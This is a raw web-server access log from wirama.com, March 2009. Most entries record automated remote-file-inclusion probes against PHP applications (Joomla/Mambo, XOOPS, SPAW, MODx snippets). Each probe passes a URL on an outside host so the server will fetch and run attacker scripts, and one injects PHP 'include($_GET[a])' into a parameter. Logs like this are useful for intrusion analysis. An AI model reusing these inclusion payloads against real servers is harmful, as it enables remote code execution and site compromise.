72.51.35.246 - - [01/Mar/2009:14:51:02 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mebelbox.home.pl/flash/elite/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
72.51.35.246 - - [01/Mar/2009:14:51:03 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mebelbox.home.pl/flash/elite/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
65.55.208.50 - - [01/Mar/2009:15:11:18 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [01/Mar/2009:15:11:20 -0800] "GET /_private/?S=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:12:59 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:13:00 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:13:41 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:13:41 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
94.75.246.151 - - [01/Mar/2009:15:15:22 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://armedassault-turkiye.net/forum/attachments/room/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
94.75.246.151 - - [01/Mar/2009:15:15:22 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://armedassault-turkiye.net/forum/attachments/room/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:19:16 -0800] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
85.237.201.58 - - [01/Mar/2009:15:19:17 -0800] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
208.80.194.42 - - [01/Mar/2009:15:52:34 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; SIMBAR Enabled; Ringo; SIMBAR={311EDBA8-369D-4d6b-9773-9C71220B22A2}; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.0)" "www.wirama.com"
64.37.66.135 - - [01/Mar/2009:16:22:08 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
64.37.66.135 - - [01/Mar/2009:16:22:08 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.55.208.61 - - [01/Mar/2009:16:33:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [01/Mar/2009:16:33:13 -0800] "GET /logs/?M=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
190.66.13.122 - - [01/Mar/2009:16:51:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://cccgj.org/media/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.66.13.122 - - [01/Mar/2009:16:51:26 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://cccgj.org/media/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.66.13.122 - - [01/Mar/2009:16:52:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://cccgj.org/media/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
190.66.13.122 - - [01/Mar/2009:16:52:46 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://cccgj.org/media/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
173.32.183.1 - - [01/Mar/2009:18:08:39 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.wirama.com"
66.7.212.241 - - [01/Mar/2009:18:11:17 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=%20%09http://www.freewebtown.com/fafazin/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "wirama.com"
66.7.212.241 - - [01/Mar/2009:18:11:17 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=%20%09http://www.freewebtown.com/fafazin/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "wirama.com"
208.80.194.52 - - [01/Mar/2009:21:09:21 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Sgrunt|V109|301|S749691658|dial; snprtz|T13056100000224; .NET CLR 1.1.4322)" "wirama.com"
65.55.208.60 - - [01/Mar/2009:22:15:16 -0800] "GET /logs/?D=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
85.152.38.1 - - [01/Mar/2009:23:09:37 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wmgf.us/components/ade.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
85.152.38.1 - - [01/Mar/2009:23:09:38 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wmgf.us/components/ade.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
210.1.31.63 - - [01/Mar/2009:23:19:57 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.patroclos.com.cy/gr/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
210.1.31.63 - - [01/Mar/2009:23:19:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.patroclos.com.cy/gr/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
206.221.191.237 - - [02/Mar/2009:00:07:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://insequip.com//data/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.221.191.237 - - [02/Mar/2009:00:07:29 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://insequip.com//data/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.221.191.237 - - [02/Mar/2009:00:07:36 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://insequip.com//data/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.96.194.188 - - [02/Mar/2009:00:51:04 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.ch/search?hl=de&q=+Wirama&btnG=Suche&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
193.96.194.188 - - [02/Mar/2009:00:51:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "wirama.com"
65.55.208.61 - - [02/Mar/2009:00:54:27 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [02/Mar/2009:00:54:27 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.96.194.188 - - [02/Mar/2009:00:55:33 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
65.55.208.61 - - [02/Mar/2009:01:00:39 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [02/Mar/2009:01:02:58 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [02/Mar/2009:01:02:59 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
38.99.13.121 - - [02/Mar/2009:02:15:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "wirama.com"
65.55.208.60 - - [02/Mar/2009:02:23:13 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [02/Mar/2009:02:23:14 -0800] "GET /_private/?N=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:33:40 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:33:40 -0800] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:33:41 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:36:44 -0800] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:36:44 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "wirama.com"
85.152.38.1 - - [02/Mar/2009:02:36:45 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://wmgf.us/components/id1.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "wirama.com"
193.34.148.140 - - [02/Mar/2009:02:44:27 -0800] "GET /logs//errors.php?error=http://movie-net.tv/bbs/data/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.34.148.140 - - [02/Mar/2009:02:44:27 -0800] "GET /logs/access.log//errors.php?error=http://movie-net.tv/bbs/data/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.34.148.140 - - [02/Mar/2009:02:44:27 -0800] "GET /errors.php?error=http://movie-net.tv/bbs/data/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.76.63.19 - - [02/Mar/2009:02:58:12 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/z-3r0/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
80.76.63.19 - - [02/Mar/2009:02:58:12 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/z-3r0/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
65.55.208.64 - - [02/Mar/2009:03:49:37 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.64 - - [02/Mar/2009:03:49:38 -0800] "GET /logs/ HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
62.149.172.45 - - [02/Mar/2009:03:52:17 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.149.172.45 - - [02/Mar/2009:03:52:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.149.172.45 - - [02/Mar/2009:03:52:18 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
62.149.172.45 - - [02/Mar/2009:03:52:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.30.142.221 - - [02/Mar/2009:04:31:55 -0800] "GET /text/ HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
83.96.133.221 - - [02/Mar/2009:05:17:09 -0800] "GET /logs/access.log//snippet.reflect.php?reflect_base=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.96.133.221 - - [02/Mar/2009:05:17:09 -0800] "GET /logs//snippet.reflect.php?reflect_base=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.96.133.221 - - [02/Mar/2009:05:17:09 -0800] "GET /snippet.reflect.php?reflect_base=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.61 - - [02/Mar/2009:05:17:47 -0800] "GET /logs/?M=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.44.154.31 - - [02/Mar/2009:06:09:50 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.44.154.31 - - [02/Mar/2009:06:09:50 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.44.154.31 - - [02/Mar/2009:06:11:36 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.44.154.31 - - [02/Mar/2009:06:11:36 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
38.108.180.106 - - [02/Mar/2009:06:25:01 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "wirama.com"
38.108.180.106 - - [02/Mar/2009:06:25:02 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "wirama.com"
63.148.24.80 - - [02/Mar/2009:06:30:50 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
63.148.24.80 - - [02/Mar/2009:06:30:50 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
24.199.219.129 - - [02/Mar/2009:06:35:34 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com/search?hl=en&q=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+5.1%3B+en-us%3B+rv%3A1.9.0.5%29+gecko%2F2008120122+firefox%2F3.0.5&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "www.wirama.com"
63.148.24.80 - - [02/Mar/2009:06:37:39 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
63.148.24.80 - - [02/Mar/2009:06:37:39 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zumhexenkessel.de/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:51:27 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:51:30 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:51:40 -0800] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:52:04 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:52:04 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.21 - - [02/Mar/2009:06:52:04 -0800] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.26 - - [02/Mar/2009:06:55:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.26 - - [02/Mar/2009:06:55:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
147.83.175.41 - - [02/Mar/2009:07:00:50 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
147.83.175.41 - - [02/Mar/2009:07:00:50 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
209.217.76.244 - - [02/Mar/2009:07:06:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
209.217.76.244 - - [02/Mar/2009:07:06:41 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
209.217.76.244 - - [02/Mar/2009:07:06:49 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
209.217.76.244 - - [02/Mar/2009:07:06:49 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
147.83.175.41 - - [02/Mar/2009:07:08:38 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
147.83.175.41 - - [02/Mar/2009:07:08:38 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.samgler.com/minibb/dummy/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
76.12.55.52 - - [02/Mar/2009:07:33:22 -0800] "GET /logs//add.php?APB_rp=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
76.12.55.52 - - [02/Mar/2009:07:33:22 -0800] "GET /add.php?APB_rp=http://radio-jammaah.net/arabhack/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
61.19.71.88 - - [02/Mar/2009:07:36:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blackincoming.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.19.71.88 - - [02/Mar/2009:07:36:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blackincoming.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.19.71.88 - - [02/Mar/2009:07:36:55 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blackincoming.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.1.16.230 - - [02/Mar/2009:07:38:17 -0800] "GET /logs//add.php?APB_rp=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
72.1.16.230 - - [02/Mar/2009:07:38:17 -0800] "GET /add.php?APB_rp=http://marcio.eng.br/marcio/Arquivos/Cracker/ver??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
129.12.48.167 - - [02/Mar/2009:07:55:46 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "wirama.com"
129.12.48.167 - - [02/Mar/2009:07:55:47 -0800] "GET / HTTP/1.0" 200 900 "http://www.google.co.uk/search?hl=en&q=Wirama&btnG=Google+Search&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
129.12.48.167 - - [02/Mar/2009:07:55:51 -0800] "GET / HTTP/1.0" 200 900 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
65.55.208.61 - - [02/Mar/2009:08:21:15 -0800] "GET /logs/?D=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
24.199.219.129 - - [02/Mar/2009:08:27:44 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com/search?hl=en&q=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+5.1%3B+en-us%3B+rv%3A1.9.0.5%29+gecko%2F2008120122+firefox%2F3.0.5&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "www.wirama.com"
203.160.1.76 - - [02/Mar/2009:08:37:16 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.usmc4-56.com/guestbook//tmp/introduction/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
203.160.1.76 - - [02/Mar/2009:08:37:16 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.usmc4-56.com/guestbook//tmp/introduction/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.30.142.221 - - [02/Mar/2009:08:48:18 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
203.160.1.76 - - [02/Mar/2009:09:29:41 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.usmc4-56.com/guestbook//tmp/introduction/v5id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.226.88.17 - - [02/Mar/2009:09:43:27 -0800] "GET /logs/mambots/errors.php?error=http://www.szczepanski.net.pl/my/left.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
207.226.88.17 - - [02/Mar/2009:09:43:27 -0800] "GET /mambots/errors.php?error=http://www.szczepanski.net.pl/my/left.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
64.56.65.37 - - [02/Mar/2009:10:00:01 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/wirama.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "wirama.com"
64.56.65.37 - - [02/Mar/2009:10:00:01 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/wirama.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "wirama.com"
64.56.65.37 - - [02/Mar/2009:10:00:02 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/wirama.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "wirama.com"
